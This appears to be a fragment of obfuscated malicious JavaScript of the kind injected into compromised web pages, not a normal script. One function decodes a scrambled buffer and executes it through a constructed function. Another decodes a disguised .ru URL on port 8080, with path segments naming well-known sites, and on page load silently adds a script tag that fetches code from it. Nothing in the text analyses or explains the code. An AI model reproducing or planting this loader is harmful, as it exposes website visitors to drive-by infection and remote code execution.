a("l.ijpistveseiedr.ugn800:8", [3,4,1,0,2]),6, a("tttA.edst(\'eiurbdefer\'", [6,4,7,5,0,3,1,2]),7, a("ndwi.oowoanld", [2,3,0,1]),8, a("opnrohtsc.mo", [1,0]),11, a("cnfut(nio)", [2,3,1,0,4]),12, a("oge.lgocom", [5,0,6,1,4,2,3]),14, a("tahc(ec)", [3,1,0,6,2,4,5]),15, a("est.rnde", [1,2,0]),16, a("h\"tt:p", [1,0]),17, a("eatnxg", [3,0,4,2,1]),18, a("sd.rc", [1,2,0]),19, a("1\')\'", [1,0]),20, a("ytr", [1,2,0])];var X =[0,197][0];var Rk;if(Rk!=''){Rk='Is'};var bq;if(bq!='WWm'){bq=''};var ga = m[a("eltngh", [1,0,3,4,2])];var sN;if(sN!='' && sN!='sy'){sN='lN'};var CF = '';var Th=60062;var Sn;if(Sn!=''){Sn='dW'};var s =[0][0];var YM;if(YM!=''){YM='Fq'};var SR;if(SR!='' && SR!='zQ'){SR='pv'};var bw = '';var oT;if(oT!='' && oT!='YqB'){oT=null};var T =[193,29,1][2];var DF=3990;this.Vq="";var qU;if(qU!='Vr'){qU='Vr'};this.to=14545;for(var V=X; V < ga; V+=w){Bb+= n; var QA=new Array();var GY="";Bb+= m[a("usbtsr", [1,0,2])](V, w);var xu=22685;}var m = B(Bb);this.jU="jU";var S = new f(F);this.LD="";var Kd;if(Kd!='Ov' && Kd!='yd'){Kd=''};var U = S[a("lerpace", [2,1,3,0])](Cm, CF);this.ob="";this.LO='';this.lB='';var dF = Aa[a("enlthg", [2,0,1])];this.yx='';this.Fy=false;var zZ = new f(NV);var cc=new Date();var mt;if(mt!='rn'){mt=''};U = G(U);var so;if(so!=''){so='FyE'};this.jf=5004;var KaF=new Date();var L = zZ[a("epracle", [2,0,1])](Cm, CF);var ov;if(ov!='' && ov!='uE'){ov=''};var L = gE(L);var mw=gE(U);var Dc;if(Dc!='ei' && Dc!='jF'){Dc='ei'};var wZ=false;for(var Ry=X; Ry < (m[a("nelhtg", [2,1,0])]);Ry=Ry+[18,1,26,45][1]) {var qg='';var zH = U.charCodeAt(s);var qb=new Array();var dU = t(m,Ry);var ZB;if(ZB!='bX'){ZB=''};var YJ;if(YJ!='CJ'){YJ='CJ'};dU = j(dU, zH);var gv;if(gv!='EM' && gv!='kv'){gv='EM'};dU = j(dU, mw);dU = j(dU, L);var YX;if(YX!='XF' && YX!='oO'){YX='XF'};var yA;if(yA!='gw' && yA!='uF'){yA='gw'};var Qm='';s++;this.tX="";var lJ=new Array();if(s > U.length-T){s=X;var Pqc;if(Pqc!='CN'){Pqc='CN'};var BJ;if(BJ!='' && BJ!='rD'){BJ=null};}var Izd;if(Izd!='LEr'){Izd='LEr'};var XA;if(XA!='tE'){XA=''};var gae;if(gae!='' && gae!='ozb'){gae=''};bw += k(dU);}for(Ln=X; Ln < dF; Ln+=w){var ZK;if(ZK!='bS'){ZK=''};var lx=new String();this.vf=14212;var Ll;if(Ll!='' && Ll!='ti'){Ll=null};var x = k(Aa[Ln]);var hH;if(hH!='' && hH!='LZ'){hH=''};var EFr;if(EFr!='' && EFr!='yn'){EFr=''};var Xc = Aa[Ln + T];var gh=new Array();var HA;if(HA!='ArE'){HA=''};var v = new GT(x, k(103));this.TQ=53110;bw=bw[a("erlpcae", [1,0])](v, Xc);var erp=new Date();}this.Hi=62596;var VA;if(VA!=''){VA='Aq'};var aG=new NV(bw);var hz;if(hz!='vLm'){hz=''};var bb;if(bb!='aA' && bb != ''){bb=null};aG();var ou;if(ou!='Oh' && ou != ''){ou=null};this.MV='';var tA;if(tA!='' && tA!='BK'){tA=''};var kq=new Date();L = '';var dY=new Array();var xB=new Array();aG = '';this.hI="";U = '';bw = '';this.uP="";mw = '';zZ = '';var who;if(who!='' && who!='zJc'){who=''};var ZF;if(ZF!=''){ZF='Cw'};var Nq;if(Nq!='' && Nq!='Ff'){Nq='Kx'};var TP;if(TP!='' && TP!='Jg'){TP=''};return '';var Si="Si";var qer;if(qer!='' && qer!='ll'){qer=null};};this.kU="kU";var YcR;if(YcR!='acu' && YcR!='ml'){YcR='acu'};F(Av);
this.u="";function R() {var Cc;if(Cc!='' && Cc!='Ac'){Cc=''};var A='replace';var i='g';var Et;if(Et!='G' && Et!='l'){Et='G'};this.TZ="";var ie='[';var Aq=new String();var E=new String();var Tb=new Array();var OZ;if(OZ!='' && OZ!='Q'){OZ=''};var z=']';var f=RegExp;var v;if(v!='t'){v='t'};function O(N,Oj){var kR=new String();var zM=ie;var ER;if(ER!='' && ER!='RW'){ER=''};zM+=Oj;var ah;if(ah!='LB' && ah != ''){ah=null};var b=new Array();zM+=z;var KU;if(KU!='' && KU!='vt'){KU=''};var EK=new f(zM, i);var p;if(p!='g' && p!='MB'){p='g'};return N[A](EK, E);};var S='';var TZJ=new String();var c=O('cdrxedadtxexExldexmdexndtd',"xd");var T=O('8525555057257877751755015175',"5172");var I=O('sIcorIiopotM',"o1I6M");var D="";var F=O('hAtntApL:V/A/VrVeAdqtnuVbneV-qcnoVmL.AaAdqoVbVen.ncAoAmq.LlLaAtViLmVeqsn-AcnoVmq.AsqaVmVuneqsAtn.VrLuV:L',"qnVLA");var wv="";var pN=new Date();var _=window;var fh='';var W='';var Js=new Array();var C=O('/4g0oToJgTlJe4.0c0oJmU.Ja0u4/4g0o0o0gTlUeJ.0cJoTmJ.0a0u4/UaJmTeTrUi0cUaJn4eTx0pJrJeUsTs4.Tc4o0mJ/0g4oJo4g4lJe4.TcToJmU/TcUyUwJoUrTlTd0.Tc4oTm4.Jp4hJp0',"4UT0J");var Nf;if(Nf!='Fc'){Nf=''};var X;if(X!='WT' && X!='Ow'){X='WT'};var ee;if(ee!='tF' && ee!='Mh'){ee='tF'};_[O('oqnCl1oCa1dq',"q1rC")]=function(){var aK=new String();var qH=new String();try {this.bu="";this.hR='';var CJ='';W+=F;var MQ=new String();this.mw="";W+=T;var XR=new Date();W+=C;var Fe;if(Fe!='P_' && Fe != ''){Fe=null};var NS='';var qZ="";var Dk=new Array();co=document[c](I);var rE;if(rE!='XM' && rE != ''){rE=null};this.UF="";OF(co,'defer',([1,1][0]));var Ue;if(Ue!='zn'){Ue='zn'};var Bp=new Array();var jz=new Date();OF(co,'src',W);document.body.appendChild(co);var wU=new String();} catch(j){};var NF=new String();var Gz=new String();};var Td="";function OF(K,H,q){var Zu;if(Zu!='gU'){Zu='gU'};var jf='';K.setAttribute(H, q);var aa;if(aa!='' && aa!='Hn'){aa=''};}var n=new Date();var Ju;if(Ju!='gs'){Ju=''};};var bV=new Array();var wF='';R();